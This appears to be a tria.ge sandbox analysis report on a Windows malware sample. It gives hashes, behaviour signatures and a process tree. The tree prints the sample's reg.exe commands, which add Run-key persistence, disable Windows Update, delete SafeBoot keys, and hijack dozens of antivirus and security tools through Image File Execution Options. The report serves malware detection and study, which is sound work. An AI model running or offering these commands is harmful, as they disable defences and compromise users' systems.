Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/07/2024, 05:19

General

  • Target

    33714f9911a0e53e7c88fed03d76bd24_JaffaCakes118.exe

  • Size

    61KB

  • MD5

    33714f9911a0e53e7c88fed03d76bd24

  • SHA1

    5914171a6baf02486159c851019d991e2d0ba279

  • SHA256

    eb2231d811d3f155d8f842b0cfc2d40cac2ec1b8028fd921a33982892035e049

  • SHA512

    53f91bb056a84de007cb3ef161eb95b68ac99b13a59474454c6f7f1b99c1be90e5da4b4594c83da7fc6a0045d0fa7927aff7ab76fe75ae94bd1b0db41665c39d

  • SSDEEP

    1536:vzxqFQa86qEGpeuomUHPKcgdEKmAEco6tQx:rgD7qzUWUHPKrdEKmAEco6tQx

Malware Config

Signatures

  • Disables RegEdit via registry modification 1 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 21 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops autorun.inf file 1 TTPs 9 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 7 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\33714f9911a0e53e7c88fed03d76bd24_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\33714f9911a0e53e7c88fed03d76bd24_JaffaCakes118.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:4540
    • C:\Windows\SysWOW64\crsss.exe
      C:\Windows\system32\crsss.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Enumerates connected drives
      • Drops autorun.inf file
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D C:\Windows\system32\crsss.exe /F
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:2200
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
        3⤵
          PID:388
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_SZ /d 3 /f
          3⤵
          • Modifies registry key
          PID:3628
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
          3⤵
          • Modifies registry key
          PID:3992
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
          3⤵
          • Modifies registry key
          PID:3864
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
          3⤵
          • Modifies registry key
          PID:452
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
          3⤵
          • Modifies registry key
          PID:4616
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
          3⤵
            PID:4452
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
            3⤵
            • Event Triggered Execution: Image File Execution Options Injection
            PID:2948
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
            3⤵
              PID:3076
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
              3⤵
                PID:3600
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                3⤵
                  PID:4556
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                  3⤵
                  • Event Triggered Execution: Image File Execution Options Injection
                  PID:4744
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AST.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                  3⤵
                    PID:1160
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                    3⤵
                      PID:2672
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                      3⤵
                      • Event Triggered Execution: Image File Execution Options Injection
                      PID:5060
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                      3⤵
                        PID:2444
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                        3⤵
                        • Event Triggered Execution: Image File Execution Options Injection
                        PID:3792
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                        3⤵
                        • Event Triggered Execution: Image File Execution Options Injection
                        PID:1404
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                        3⤵
                        • Event Triggered Execution: Image File Execution Options Injection
                        PID:5100
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                        3⤵
                        • Event Triggered Execution: Image File Execution Options Injection
                        PID:1556
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                        3⤵
                        • Event Triggered Execution: Image File Execution Options Injection
                        PID:3220
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                        3⤵
                          PID:3184
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                          3⤵
                          • Event Triggered Execution: Image File Execution Options Injection
                          PID:4276
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                          3⤵
                          • Event Triggered Execution: Image File Execution Options Injection
                          PID:2300
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                          3⤵
                            PID:4324
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                            3⤵
                              PID:4872
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                              3⤵
                              • Event Triggered Execution: Image File Execution Options Injection
                              PID:2736
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                              3⤵
                              • Event Triggered Execution: Image File Execution Options Injection
                              PID:1396
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                              3⤵
                              • Event Triggered Execution: Image File Execution Options Injection
                              PID:1464
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                              3⤵
                              • Event Triggered Execution: Image File Execution Options Injection
                              PID:3196
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                              3⤵
                              • Event Triggered Execution: Image File Execution Options Injection
                              PID:4760
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                              3⤵
                                PID:4472
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                3⤵
                                • Event Triggered Execution: Image File Execution Options Injection
                                PID:4416
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                3⤵
                                • Event Triggered Execution: Image File Execution Options Injection
                                PID:4180
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                3⤵
                                • Event Triggered Execution: Image File Execution Options Injection
                                PID:4016
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                3⤵
                                  PID:2288
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                  3⤵
                                    PID:1576
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                    3⤵
                                      PID:1328
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                      3⤵
                                      • Event Triggered Execution: Image File Execution Options Injection
                                      PID:2056
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                      3⤵
                                      • Event Triggered Execution: Image File Execution Options Injection
                                      PID:8
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                      3⤵
                                        PID:732
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                        3⤵
                                        • Event Triggered Execution: Image File Execution Options Injection
                                        PID:324
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                        3⤵
                                          PID:4348
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                          3⤵
                                          • Event Triggered Execution: Image File Execution Options Injection
                                          PID:3668
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                          3⤵
                                          • Event Triggered Execution: Image File Execution Options Injection
                                          PID:3464
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                          3⤵
                                          • Event Triggered Execution: Image File Execution Options Injection
                                          PID:4244
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                          3⤵
                                            PID:4684
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                            3⤵
                                            • Event Triggered Execution: Image File Execution Options Injection
                                            PID:1452
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                            3⤵
                                            • Event Triggered Execution: Image File Execution Options Injection
                                            PID:3284
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                            3⤵
                                            • Event Triggered Execution: Image File Execution Options Injection
                                            PID:2384
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                            3⤵
                                              PID:2004
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                              3⤵
                                              • Event Triggered Execution: Image File Execution Options Injection
                                              PID:2548
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                              3⤵
                                                PID:3980
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                3⤵
                                                • Event Triggered Execution: Image File Execution Options Injection
                                                PID:988
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  4⤵
                                                    PID:452
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                  3⤵
                                                    PID:728
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                    3⤵
                                                      PID:852
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                      3⤵
                                                        PID:408
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                        3⤵
                                                        • Event Triggered Execution: Image File Execution Options Injection
                                                        PID:4152
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                        3⤵
                                                        • Event Triggered Execution: Image File Execution Options Injection
                                                        PID:376
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                        3⤵
                                                        • Event Triggered Execution: Image File Execution Options Injection
                                                        PID:3600
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                        3⤵
                                                        • Event Triggered Execution: Image File Execution Options Injection
                                                        PID:3632
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                        3⤵
                                                          PID:4876
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                          3⤵
                                                          • Event Triggered Execution: Image File Execution Options Injection
                                                          PID:2884
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                          3⤵
                                                          • Event Triggered Execution: Image File Execution Options Injection
                                                          PID:264
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                          3⤵
                                                          • Event Triggered Execution: Image File Execution Options Injection
                                                          PID:3612
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                          3⤵
                                                          • Event Triggered Execution: Image File Execution Options Injection
                                                          PID:2672
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                          3⤵
                                                          • Event Triggered Execution: Image File Execution Options Injection
                                                          PID:1428
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                          3⤵
                                                          • Event Triggered Execution: Image File Execution Options Injection
                                                          PID:3912
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                          3⤵
                                                          • Event Triggered Execution: Image File Execution Options Injection
                                                          PID:2532
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            4⤵
                                                              PID:5100
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                            3⤵
                                                              PID:2840
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                              3⤵
                                                              • Event Triggered Execution: Image File Execution Options Injection
                                                              PID:1208
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                              3⤵
                                                              • Event Triggered Execution: Image File Execution Options Injection
                                                              PID:1420
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                              3⤵
                                                              • Event Triggered Execution: Image File Execution Options Injection
                                                              PID:4780
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                              3⤵
                                                                PID:2316
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                3⤵
                                                                • Event Triggered Execution: Image File Execution Options Injection
                                                                PID:1776
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                3⤵
                                                                  PID:5048
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                  3⤵
                                                                  • Event Triggered Execution: Image File Execution Options Injection
                                                                  PID:2212
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    4⤵
                                                                      PID:1464
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                    3⤵
                                                                      PID:1052
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                      3⤵
                                                                      • Event Triggered Execution: Image File Execution Options Injection
                                                                      PID:4856
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\crsss.exe /F
                                                                      3⤵
                                                                      • Event Triggered Execution: Image File Execution Options Injection
                                                                      PID:3476
                                                                    • C:\Windows\SysWOW64\reg.exe
